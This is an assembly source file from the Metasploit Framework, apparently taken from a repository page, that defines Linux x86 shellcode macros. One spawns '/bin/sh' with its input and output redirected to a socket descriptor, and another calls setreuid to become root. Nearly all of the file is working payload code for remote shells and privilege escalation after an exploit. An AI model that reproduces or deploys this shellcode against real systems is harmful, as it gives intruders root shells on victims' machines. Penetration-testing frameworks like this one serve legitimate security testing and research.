metasploit-framework/external/source/shellcode/linux/ia32/generic.asm

164 lines
2.5 KiB
NASM
Raw Normal View History

;;
;
; Name: generic
; Type: Macro Set
; Qualities: None
; Authors: skape <mmiller [at] hick.org>
; Version: $Revision: 1407 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This file provides a generic API of macros that can be used
; by payloads. No payloads are actually implemented within this
; file.
;
; Macro List:
;
; execve_binsh - Executes a command shell with flags
; setreuid - Set real/effective user id
;;
BITS 32
;;
; Define undefined assumptions
;;
%ifndef ASSUME_REG_EDX
%define ASSUME_REG_EDX -1
%endif
%ifndef ASSUME_REG_EAX
%define ASSUME_REG_EAX -1
%endif
;;
; Macro: execve_binsh
; Purpose: Execute a command shell with various options
; Arguments:
;
; Execution flags: Flags used for executing the command shell in a
; number of modes.
;
; EXECUTE_REDIRECT_IO => Redirects stdin/stdout/stderr to the fd
; passed in 'edi'.
; EXECUTE_DISABLE_READLINE => Disables readline support. This is
; needed for redirection to UDP sockets.
;;
%define EXECUTE_REDIRECT_IO 0x0001
%define EXECUTE_DISABLE_READLINE 0x0002
%macro execve_binsh 1
%if %1 & EXECUTE_REDIRECT_IO
dup:
%ifdef FD_REG_EBX
%else
mov ebx, edi
%endif
push byte 0x2
pop ecx
dup_loop:
%if ASSUME_REG_EAX == 0
mov al, 0x3f
%else
push byte 0x3f
pop eax
%endif
int 0x80
dec ecx
jns dup_loop
%endif
execve:
%if ASSUME_REG_EAX == 0
mov al, 0xb
%else
push byte 0xb
pop eax
%endif
%if ASSUME_REG_EDX == 0
%else
cdq
%endif
push edx
%if %1 & EXECUTE_DISABLE_READLINE
push word 0x692d
mov ecx, esp
push byte 0x67
push word 0x6e69
push dword 0x74696465
push dword 0x6f6e2d2d
mov edi, esp
push edx
push dword 0x68732f2f
push dword 0x6e69622f
%else
push dword 0x68732f2f
push dword 0x6e69622f
%endif
mov ebx, esp
push edx
%if %1 & EXECUTE_DISABLE_READLINE
push ecx
push edi
%endif
push ebx
mov ecx, esp
int 0x80
%endmacro
;;
; Macro: setreuid
; Purpose: Set effective user id
; Arguments:
;
; User ID: The user identifier to setreuid to, typically 0.
;;
%macro setreuid 1
setreuid:
%if %1 == 0
xor ecx, ecx
%else
%if %1 < 256
push byte %1
%else
push dword %1
%endif
pop ecx
%endif
mov ebx, ecx
push byte 0x46
pop eax
int 0x80
%endmacro